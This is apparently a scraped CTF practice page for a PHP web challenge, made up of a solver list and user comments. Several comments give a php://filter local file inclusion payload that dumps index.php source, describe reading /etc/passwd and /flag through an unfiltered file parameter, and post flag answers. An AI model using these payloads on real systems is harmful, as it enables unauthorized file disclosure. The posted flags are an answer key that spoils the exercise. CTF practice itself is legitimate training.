评分(11)
解题动态
18171382569 攻破了该题 15小时前
krnxy777 攻破了该题 2天前
Wu. 攻破了该题 3天前
qq1002517 攻破了该题 4天前
麻辣鸽子头 攻破了该题 4天前
Arno_Zoffy 攻破了该题 5天前
Jasmine_Iris 攻破了该题 5天前
AioKT 攻破了该题 5天前
潭影空人心 攻破了该题 6天前
hdcc1 攻破了该题 7天前
linxingjun 攻破了该题 10天前
jaysongong 攻破了该题 10天前
violet1 攻破了该题 11天前
potato66 攻破了该题 11天前
一只小白鲸 攻破了该题 12天前
xiaoxuexue 攻破了该题 13天前
bak3l1 攻破了该题 13天前
妙龄 攻破了该题 13天前
19113115774 攻破了该题 13天前
评论
tardigrade 2年前
举报
http://xxxx/index.php?file=php://filter/read=convert.base64-encode/resource=index.php
嵌入式学的CTF 3年前
举报
PHP伪协议详解https://blog.csdn.net/cosmoslin/article/details/120695429
xiaoxiao972521 3年前
举报
????直接/flag就出来了?
iwindy 3年前
举报
没意思,为啥3金币
453137 3年前
举报
flag{3f73582017c0a7d0a0d1c937fcb9ccda}
gyc3153616052 3年前
举报
flag{d2fc833912015ef20e29905ab607e995}
llluyan 3年前
举报
flag:flag{2773e5133de5c764209074ecd6cf2a3a}
canxue11 3年前
举报
payload:?file=php://filter/read=convert.base64-encode/resource=index.php base64解码可得flag
HuangYanQwQ 3年前
举报
打开环境看到有一个超链接click me? no,点进去变成了index.php,并且URL末尾多了一句index.php?file=show.php,看到*.php?file就能猜到是伪协议读取文件了,把URL改成index.php?file=/etc/passwd,爆出来的数据也能验证,而且没过滤,直接index.php?file=/flag
snickerX 3年前
举报
php://filter伪协议